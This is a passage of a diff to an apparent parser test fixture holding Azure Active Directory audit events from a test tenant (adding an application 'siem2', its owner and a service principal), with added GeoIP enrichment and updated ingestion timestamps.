env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"689aaff0-b34f-4077-9244-0563b9f9c03b\",\"ModifiedProperties\":[{\"Name\":\"AppId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AvailableToOtherTenants\",\"NewValue\":\"[\\r\\n false\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n 
]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Add application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -12278,6 +13046,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -12434,7 +13214,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125212900Z", + "ingested": "2021-12-14T14:48:43.176723825Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AppId\\\",\\\"AvailableToOtherTenants\\\",\\\"DisplayName\\\",\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"484659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; 
Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.6833528Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554400\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"689aaff0-b34f-4077-9244-0563b9f9c03b\",\"ModifiedProperties\":[{\"Name\":\"AppId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AvailableToOtherTenants\",\"NewValue\":\"[\\r\\n false\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n 
]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Add application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -12461,6 +13241,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -12615,7 +13407,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125218600Z", + "ingested": "2021-12-14T14:48:43.176724355Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"targetPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"Application.ObjectID\\\",\\\"Application.DisplayName\\\",\\\"Application.AppId\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"484659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTarg
ets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"33cdc459-1335-4d6c-b773-f5eef4df7793\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"Application\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.7383513Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554439\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ccbe264f-f6bc-42bd-b5b6-2893ce2f465f\",\"ModifiedProperties\":[{\"Name\":\"Application.ObjectID\",\"NewValue\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"OldValue\":\"\"},{\"Name\":\"Application.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"Application.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"asr@testsiem.onmicrosoft.com\",\"Operation\":\"Add
 owner to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -12645,6 +13437,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -12818,7 +13622,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125225400Z", + "ingested": "2021-12-14T14:48:43.176725300Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:31\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AccountEnabled\\\",\\\"AppPrincipalId\\\",\\\"DisplayName\\\",\\\"ServicePrincipalName\\\",\\\"Credential\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"381d015d-6660-4dce-af99-4cd8c3b61d4d\
"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:31.1327910Z\"},{\"Name\":\"env_epoch\",\"Value\":\"NNJOH\"},{\"Name\":\"env_seqNum\",\"Value\":\"39121960\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"48403af8-b712-4e63-a999-686b631240ac\",\"ModifiedProperties\":[{\"Name\":\"AccountEnabled\",\"NewValue\":\"[\\r\\n true\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AppPrincipalId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"ServicePrincipalName\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Credential\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"CredentialType\\\": 2,\\r\\n 
\\\"KeyStoreId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\",\\r\\n \\\"KeyGroupId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\"\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -12845,6 +13649,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -13018,7 +13834,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125231900Z", + "ingested": "2021-12-14T14:48:43.176725901Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:31\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AccountEnabled\\\",\\\"AppPrincipalId\\\",\\\"DisplayName\\\",\\\"ServicePrincipalName\\\",\\\"Credential\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"381d015d-6660-4dce-af99-4cd8c3b61d4d\
"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:31.1327910Z\"},{\"Name\":\"env_epoch\",\"Value\":\"NNJOH\"},{\"Name\":\"env_seqNum\",\"Value\":\"39121960\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"48403af8-b712-4e63-a999-686b631240ac\",\"ModifiedProperties\":[{\"Name\":\"AccountEnabled\",\"NewValue\":\"[\\r\\n true\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AppPrincipalId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"ServicePrincipalName\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Credential\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"CredentialType\\\": 2,\\r\\n 
\\\"KeyStoreId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\",\\r\\n \\\"KeyGroupId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\"\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add service 